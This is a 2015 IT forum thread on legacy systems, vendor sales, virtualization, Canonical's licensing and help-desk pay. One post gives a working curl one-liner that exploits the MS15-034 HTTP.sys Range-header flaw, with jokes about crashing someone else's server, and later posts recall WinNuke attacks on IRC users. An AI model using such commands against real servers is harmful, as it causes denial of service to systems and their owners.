Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Proud Christian Mom
Dec 20, 2006
READING COMPREHENSION IS HARD

Tab8715 posted:

The source of many nightmares :smith:

abandon hope, all ye who enter here

Adbot
ADBOT LOVES YOU

Gucci Loafers
May 20, 2006

Ask yourself, do you really want to talk to pair of really nice gaudy shoes?

go3 posted:

abandon hope, all ye who enter here

What's the IPL Reference code for Load Source not found?

Dr. Arbitrary
Mar 15, 2006

Bleak Gremlin

I thought the game was to post operating systems that aren't really used anymore. :negative:

Gucci Loafers
May 20, 2006

Dr. Arbitrary posted:

I thought the game was to post operating systems that aren't really used anymore. :negative:

Fack. I broke it :smith:

YOLOsubmarine
Oct 19, 2004

When asked which Pokemon he evolved into, Kamara pauses.

"Motherfucking, what's that big dragon shit? That orange motherfucker. Charizard."

adorai posted:

I love when you ask an inside sales guy from someplace like, HP, to differentiate their product from their competitors, and all they can come up with is something like, "Ours is simply better." They have no concept of the idea of competition.

Those guys aren't doing it right because most major companies have a competitive intelligence team whose entire purpose is to learn enough about competitors product to market against them, and then disseminate that information in easily digestible form that even a sales idiot can parrot.

Dr. Arbitrary
Mar 15, 2006

Bleak Gremlin

NippleFloss posted:

Those guys aren't doing it right because most major companies have a competitive intelligence team whose entire purpose is to learn enough about competitors product to market against them, and then disseminate that information in easily digestible form that even a sales idiot can parrot.

I just did a sales call with what I think was a pretty slick team. When we mentioned that we'd recently purchased competitor product x, the salesman said, "That's a great product, good choice! I think our engineer used to work for them, didn't you John. We actually have a client who has that product working side by side with our product and here's why it works great for them, I'll send you a case study!"

Gucci Loafers
May 20, 2006

For the thread, is talk of competitors products permitted in your organization? I don't mean in front of a customer but in a general sense and bring up both bad and points.

NippleFloss posted:

I think working for Gartner would be incredibly enjoyable.

SSH IT ZOMBIE
Apr 19, 2003
No more blinkies! Yay!
College Slice

Wanna type WRKSYSSTS
Is this I5/OS?

SSH IT ZOMBIE fucked around with this message at 05:42 on Apr 17, 2015

Gucci Loafers
May 20, 2006

SSH IT ZOMBIE posted:

The hell? It looks like an AS/400, but, maybe older? We had an i5 running in production a few years ago, that looks even older.

I just searched iseries login and this was first half-way decent picture.

SSH IT ZOMBIE
Apr 19, 2003
No more blinkies! Yay!
College Slice
God we have this Sequent system running god knows what OS. We have a login. A giant reel to reel tape drive is attached to it. I wonder if it's still alive, forgot totally about it until I saw that ancient picture. Going to see if I can log in and get a screenshot.

Edit: Dynix, and it's not on the network anymore. drat!

SSH IT ZOMBIE fucked around with this message at 06:12 on Apr 17, 2015

Gucci Loafers
May 20, 2006

SSH IT ZOMBIE posted:

God we have this Sequent system running god knows what OS. We have a login. A giant reel to reel tape drive is attached to it. I wonder if it's still alive, forgot totally about it until I saw that ancient picture. Going to see if I can log in and get a screenshot.

Before I left my last gig I was suppose to replace one these with a NAS - http://www.plasmon.com/

jaegerx
Sep 10, 2012

Maybe this post will get me on your ignore list!

You have not known pain until you tried to support raq2.

Toshimo
Aug 23, 2012

He's outta line...

But he's right!
Why to we have unholy password requirements? PCOMM
Why are we still on 32-bit windows? PCOMM
Why did we have NT4 until Vista was old? PCOMM
Why do we have to name all the new laptops the exact same as the desktops we are removing? PCOMM

mewse
May 2, 2006

Tab8715 posted:

For the thread, is talk of competitors products permitted in your organization? I don't mean in front of a customer but in a general sense and bring up both bad and points.

I worked in a really small, niche manufacturer and we discussed our competitors all the time because they were using different technology than us and had different strengths/weaknesses

Roargasm
Oct 21, 2010

Hate to sound sleazy
But tease me
I don't want it if it's that easy

Oh man this is hysterically easy: http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
All you do is
code:
curl -v 192.168.1.100/publicFile.html -H "Host: test" -H "Range: bytes=20-18446744073709551615"
The only unpatched IIS server I can find onsite isn't mine :( Wanna crash that server.

CLAM DOWN
Feb 13, 2007

Roargasm posted:

Oh man this is hysterically easy: http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
All you do is
code:
curl -v 192.168.1.100/publicFile.html -H "Host: test" -H "Range: bytes=20-18446744073709551615"
The only unpatched IIS server I can find onsite isn't mine :( Wanna crash that server.

I tried this last night and it totally works on an unpatched system, really cool haha

Dick Trauma
Nov 30, 2007

God damn it, you've got to be kind.

Tab8715 posted:

The source of many nightmares :smith:

This is the worst part working for major IT Company - Microsoft, IBM, Google, Apple, etc... So many people have never touched any competing product and falsely think that the alternatives are weird. More than nine times they're not weird they're just as good but different.

I have never seen a 3270 display with a copyright year beyond 1980. :stare:

Docjowles
Apr 9, 2009

CLAM DOWN posted:

I tried this last night and it totally works on an unpatched system, really cool haha

Reminds me of the good old days circa Windows 98 when everyone was sitting on a public IP with no firewall or anything between you and the internet. Someone being a dick on IRC? Click a button and BSOD that sucker :owned:

Wish I could remember the actual name of the exploit people used back then.

Extremely Penetrated
Aug 8, 2004
Hail Spwwttag.

Docjowles posted:

Reminds me of the good old days circa Windows 98 when everyone was sitting on a public IP with no firewall or anything between you and the internet. Someone being a dick on IRC? Click a button and BSOD that sucker :owned:

WinNuke! The bane of everyone sitting on the other side of the elementary school computer lab.
http://en.wikipedia.org/wiki/WinNuke

psydude
Apr 1, 2008

Docjowles posted:

Was all about the ICMP flood DoS on IRC.

Docjowles
Apr 9, 2009

Shuntly posted:

WinNuke! The bane of everyone sitting on the other side of the elementary school computer lab.

Yessss that's it!

Fiendish Dr. Wu
Nov 11, 2010

You done fucked up now!

Shuntly posted:

Hahaha oh mannnnnnn

Aunt Beth
Feb 24, 2006

Baby, you're ready!
Grimey Drawer

Toshimo posted:

Why to we have unholy password requirements? PCOMM
Why are we still on 32-bit windows? PCOMM
Why did we have NT4 until Vista was old? PCOMM
Why do we have to name all the new laptops the exact same as the desktops we are removing? PCOMM
PCOMM runs just fine on 64-bit Windows? I have a session open on Win7x64 right now.

Dick Trauma
Nov 30, 2007

God damn it, you've got to be kind.
This has quickly become my favorite fringe benefit of working at this place.

SyNack Sassimov
May 4, 2006

Let the robot win.
            --Captain James T. Vader

^^^^^ Holy poo poo, do you get to drive it? Can you drive it over to Tony's place and give him the finger, then speed off and leave him choking on your dust? That would be amazing.

evol262 posted:

You may want to stop reading the register. Free software is sometimes the best tool, sometimes not. You may also want to learn a lot more about virtualization solutions. And AWS. And open/free software. You're talking out of your rear end a lot more than slightly.

KVM is a kernel module. Xen is a supervising kernel. Xen has tools that almost nobody uses. KVM is just an accelerator for qemu on steroids. Almost nothing uses plain qemu. Both xen and KVM get the vast majority of their interaction through libvirt.

XenServer and RHEV (for xen and KVM) are products like vSphere. VMkernel is the equivalent to KVM. Not vCenter. Xen Cloud Platform and oVirt are the free versions of these (ovirt is actually upstream for rhev, xcp is just very similar to XenServer). Both are surprisingly comparable to vCenter, missing out on stuff like FT (nobody uses it anyway) and VAAI (proprietary). That changes when you add on a zillion vProducts, but for the "vCenter+hosts" use case, you'd find them very similar.

AWS is in such a different class you can't even compare it to vCenter in any meaningful way until/if VMware gets their poo poo together with vCloud and/or their openstack integration. You can compare it to openstack and eucalyptus, though.

FYI, we in the open source world also think these people are idiots. That's not a " $someos zealot" problem. He wanted to use the tools he thought he knew the best and nobody pushed back hard enough or ate the cost of his contract to get something sustainable which fit with the infrastructure and requirements at your workplace. When they did, they thought they could polish a turd or salvage something instead of just totally writing it off. Both sides failed badly, not just him.

The development team is often the problem, or one guy. Or the admin team. The problem is that people don't know what's out there, how other people solve it, and what their options are. I honestly see this less with *nix admins. Maybe because their teams are much smaller on average and they're supporting more servers per admin. Or they're more multidisciplinary than Windows admins because they're expected to know how to code more than a little bit. Or because years of fighting and tinkering with the OS have put them in compromising situations they've needed to figure out. Or because it's glued together and there's no nice products for stuff without tying together 5 programs yourself. I don't know.

But last time I saw a team re-invent network imaging, it was Windows. And last time I saw a team re-invent display forwarding, it was Windows. And last time I saw...

Stupid people are not limited to one OS

Oh hey I done got yelled at by our resident crankypants! I feel like I've made it as an SH/SC poster.

Anyway perfectly happy to admit I know jack and or poo poo about the Xen/KVM/VMkernel side of things, so thanks for the edumacation - I do have it on my list to learn far more about open source virt stuff since my current experience is all VMware and MS, and a decent amount of working with AWS. You should be aware however that my guiding principle is always the right tool for the right job, so if my post somehow came off as suggesting that open source tools are always the worse option that is not how it was meant. Apparently I picked a bad example. However I do think there are tools for which the open-source equivalent doesn't necessarily have the polish and consistency that the proprietary equivalent has (because that takes developer time and may not be a priority of the developers working on that project), and many times in a business environment admins simply don't have the time to gently caress around getting something to work, which is often a big reason to use and pay for those proprietary tools. Companies like Canonical, whatever else their sins are, at least have the right idea of trying to add that extra layer of whatever you want to call it that doesn't result in someone not familiar with the OS getting frustrated immediately. You know, what Apple does. (Well and your own company does the same thing on the server side so that the OS can be depended upon to not have ridiculous bugs and inconsistencies in operation because some developer didn't want to take the time to make his part work with another piece of the system).

As far as my client's developer goes, I was using zealot as a shorthand for what you describe, someone who isn't willing or able to learn another toolset and basically reacts by getting furious with anyone who suggests there's a better way (or rather a way that would be more appropriate for the situation). In this case we being vendors ourselves were unable to put our foot down in terms of how he and his system should interact with systems already in place, and our client, having hired the guy independently, obviously didn't want to admit to themselves his unsuitability for the job, and of course weren't technically knowledgeable enough themselves to know the full extent of the problem. That's also why it took 4-5 years to get rid of him, since basically he had ingratiated himself with the CEO and it took years of broken promises with his stuff clearly not doing what they had contracted for before they finally cut their losses.

In regards to "The problem is that people don't know what's out there, how other people solve it, and what their options are.", I would fully agree. My boss is a prime example, as he latches on to one thing and continues to push that one thing as the best answer, even when things may have changed. (The annoying bit is that I will push him and push him to change to something else when and if something better comes along, and he'll eventually change, only to insist that this new option is the best and there's nothing better). Four years ago he thought virtualization was stupid and unnecessary. Now it's "let's install a VM cluster!" for small offices where a single host would be more than enough. As far as I'm concerned that kind of certainty about any given product is death in our world, because even if it was the best option 4 weeks ago, something else may have just come along yesterday that costs less and does more, and not doing your homework about what's changed since you last dealt with an area of expertise is failing at your job.

Anyway, I look forward to your continued flaming and oh yes redhatsucksdebian4lyfe ok please continue.

What's wrong with the Register? It's like the IT version of the National Enquirer, I admit, but it's generally just amusing and I enjoy their random deviations into military scandals in Britain and of course BOFH.

evol262
Nov 30, 2010
#!/usr/bin/perl

Potato Alley posted:

Oh hey I done got yelled at by our resident crankypants! I feel like I've made it as an SH/SC poster.
I'm not ever cranky. I just don't like seeing people pass off misinformation with confidence.

Potato Alley posted:

Anyway perfectly happy to admit I know jack and or poo poo about the Xen/KVM/VMkernel side of things, so thanks for the edumacation - I do have it on my list to learn far more about open source virt stuff since my current experience is all VMware and MS, and a decent amount of working with AWS. You should be aware however that my guiding principle is always the right tool for the right job, so if my post somehow came off as suggesting that open source tools are always the worse option that is not how it was meant. Apparently I picked a bad example. However I do think there are tools for which the open-source equivalent doesn't necessarily have the polish and consistency that the proprietary equivalent has (because that takes developer time and may not be a priority of the developers working on that project), and many times in a business environment admins simply don't have the time to gently caress around getting something to work, which is often a big reason to use and pay for those proprietary tools. Companies like Canonical, whatever else their sins are, at least have the right idea of trying to add that extra layer of whatever you want to call it that doesn't result in someone not familiar with the OS getting frustrated immediately. You know, what Apple does. (Well and your own company does the same thing on the server side so that the OS can be depended upon to not have ridiculous bugs and inconsistencies in operation because some developer didn't want to take the time to make his part work with another piece of the system).
No, I mean, right tool for the right job is the thing. And it's less about open source virt (XenServer was a paid product, RHEV is a paid product. Those can also be the right tool for the job (even though RHEV is open source and XenServer is, too, even though some of the management bits aren't). Just that KVM/Xen vs. vSphere is comparing technologies to solutions. Xen and KVM aren't solutions. This is a personal irk of mine since I see it so much, and it's nothing about you specifically.

Canonical is a terrible company that does terrible things and makes an unstable distro, but that's a different rant.

Potato Alley posted:

As far as my client's developer goes, I was using zealot as a shorthand for what you describe, someone who isn't willing or able to learn another toolset and basically reacts by getting furious with anyone who suggests there's a better way (or rather a way that would be more appropriate for the situation). In this case we being vendors ourselves were unable to put our foot down in terms of how he and his system should interact with systems already in place, and our client, having hired the guy independently, obviously didn't want to admit to themselves his unsuitability for the job, and of course weren't technically knowledgeable enough themselves to know the full extent of the problem. That's also why it took 4-5 years to get rid of him, since basically he had ingratiated himself with the CEO and it took years of broken promises with his stuff clearly not doing what they had contracted for before they finally cut their losses.
No, I get that, too. I just meant that there are Windows zealots out there as well, and VMware zealots, and... When all you have is a hammer.

Potato Alley posted:

What's wrong with the Register? It's like the IT version of the National Enquirer, I admit, but it's generally just amusing and I enjoy their random deviations into military scandals in Britain and of course BOFH.
Anywhere that uses terms like "libtard" in any context (or whatever the corresponding epithet for conservatives is) can't really be taken seriously.

Dr. Arbitrary
Mar 15, 2006

Bleak Gremlin

evol262 posted:

Anywhere that uses terms like "libtard" in any context (or whatever the corresponding epithet for conservatives is) can't really be taken seriously.

From a quick search, I'm only finding that on their forums. Have they used dumb terms like that in their actual articles?

evol262
Nov 30, 2010
#!/usr/bin/perl

Dr. Arbitrary posted:

From a quick search, I'm only finding that on their forums. Have they used dumb terms like that in their actual articles?

No, it's just the forums. But conservative crank rags don't use the term either (their userbase does).

Gucci Loafers
May 20, 2006

Why is Canonical a terrible company? Sure, Ubuntu can be pretty crappy but I've never seen the company do anything awful aside from low wages.

evol262
Nov 30, 2010
#!/usr/bin/perl

Tab8715 posted:

Why is Canonical a terrible company? Sure, Ubuntu can be pretty crappy but I've never seen the company do anything awful aside from low wages.

Their contributor agreements required attribution for a long time (meaning that code I wrote for projects hosted by canonical was owned by them, not me). They still reserve the right to relicense any code I write under whatever license they want, including a closed license. We're barred from officially working with any of their projects, and not because they're a competitor. Also, producing closed-source products (landscape) as a Linux company.

Ubuntu specially is a giant hacky patchset on top of Debian unstable and unity on top of gnome2. Almost all of canonical's (very few) engineers are desperately working on openstack.

Don't get me wrong, Ubuntu did great things for Linux and what a Linux desktop experience should be like. 6-7 years ago. But at some point, the goodwill train runs out.

Gucci Loafers
May 20, 2006

evol262 posted:

Their contributor agreements required attribution for a long time (meaning that code I wrote for projects hosted by canonical was owned by them, not me). They still reserve the right to relicense any code I write under whatever license they want, including a closed license. We're barred from officially working with any of their projects, and not because they're a competitor. Also, producing closed-source products (landscape) as a Linux company.

Not sure if I'm following you here, could you go into a little more detail?

evol262
Nov 30, 2010
#!/usr/bin/perl

Tab8715 posted:

Not sure if I'm following you here, could you go into a little more detail?

Basically special pleading from Canonical. "But we might have to sell this someday, so give us rights!" Read this , especially the "outbound" part. This new agreement basically says "we don't own your code anymore (the old CLA required it), but we reserve the right to relicense your contribution as whatever the hell we want, including a more restrictive license". Because there totally aren't other companies making money hand over fist on open source projects without these restrictions and for which the code is entirely GPL.

Perpetual right? Sure. We've seen that go bad before (timezone database). Patent? I guess. Relicense under a more restrictive license? No. I submit a patch as GPL. They can relicense it, modify it, and release something including the modified patch. Without the modified source, theoretically.

I don't actually know what they're hoping to do with this. Nobody does. But it's required if you want to contribute to any projects they host. And it's really not being a good open source citizen.

Methanar
Sep 26, 2013

by the sex ghost

Methanar fucked around with this message at 05:21 on Aug 6, 2016

Altimeter
Sep 10, 2003

ElGroucho posted:

What is an Executive IT Desktop Support position? Is that just a C-level bitch? That doesn't sound like an improvement over hell desk.

It can be good or bad, depending. I've been doing it for 5-6 years at a couple of big companies. The actual CJ work tends to be easy, just with a lot more customer service focus. Lots of helping people with their new iPhones and poo poo, but you'll also likely be pulled into project work for things the c levels are going to interact with often - telepresence/video conferencing, new tech, etc. on call is going to be a given, if you've got a few guys on the team it'll officially be a rotating thing but over time you build relationships with the execs and become "their guy". This is both great and terrible - they going to trust you and want YOUR help, but that typically means regardless of if you're officially on call or not.

If you support them while they travel you'll end up at some cool locations and nice accommodations but travel gets old.

TeMpLaR
Jan 13, 2001

"Not A Crook"

Mutar posted:

It can be good or bad, depending. I've been doing it for 5-6 years at a couple of big companies. The actual CJ work tends to be easy, just with a lot more customer service focus. Lots of helping people with their new iPhones and poo poo, but you'll also likely be pulled into project work for things the c levels are going to interact with often - telepresence/video conferencing, new tech, etc. on call is going to be a given, if you've got a few guys on the team it'll officially be a rotating thing but over time you build relationships with the execs and become "their guy". This is both great and terrible - they going to trust you and want YOUR help, but that typically means regardless of if you're officially on call or not.

If you support them while they travel you'll end up at some cool locations and nice accommodations but travel gets old.

Out of curiousity, what does pay look like supporting some extremely high producing individuals like this? Standard ~50k helpdesk or is this something special?

MC Fruit Stripe
Nov 26, 2002

around and around we go
A lot of the humor of my posts in the poo poo that pisses you off thread is the curt way I reply to stupid questions in emails.

To distro: "Stripe, what's the IP to this server?"
Reply all: "What am I, DNS?"

To distro: "We're seeing this problem, please advise."
Reply all: "Did you try reading the error since it tells you what to do?"

To distro: "Stripe, this server is at 84%, please advise."
Reply all: "84% of what? And what would I do about it if I knew?"

Things like that. My point is, a couple of distros are on an email chain right now, and a guy from another department just got taken out so viciously by his own supervisor that even I am uncomfortable. My god, praise in public, push heel of boot onto skull in private, people.

e: Let's put it this way. If you go to the next paragraph and you're still piling on, this email probably shouldn't include other departments.

NeuralSpark
Apr 16, 2004

MC Fruit Stripe posted:

a guy from another department just got taken out so viciously by his own supervisor that even I am uncomfortable

Sounds like my organization. I'm on some developer mailing lists due to peripheral responsibilities and some the of the things I've seen them say to each other are absolutely brutal.

EDIT: It's bad enough that if I ever had a reason to e-mail one of those lists, I wouldn't. I'd go find an engineer on the list to ask my question of in person, in case I missed something.

NeuralSpark fucked around with this message at 21:16 on Apr 20, 2015

Altimeter
Sep 10, 2003

TeMpLaR posted:

Out of curiousity, what does pay look like supporting some extremely high producing individuals like this? Standard ~50k helpdesk or is this something special?

Don't ever take this job at regular help desk rates. You provide a premium service, and the price sure as hell better match. It's a bit busy this afternoon but if there is interest I can try to write up some more info later tonight.

KillHour
Oct 28, 2007

TeMpLaR posted:

Where do you live that 50k is standard for helpdesk?

Adbot
ADBOT LOVES YOU

MJP
Jun 17, 2007

Are you looking at me Senpai?

Grimey Drawer
Manhattan, if you've got some experience.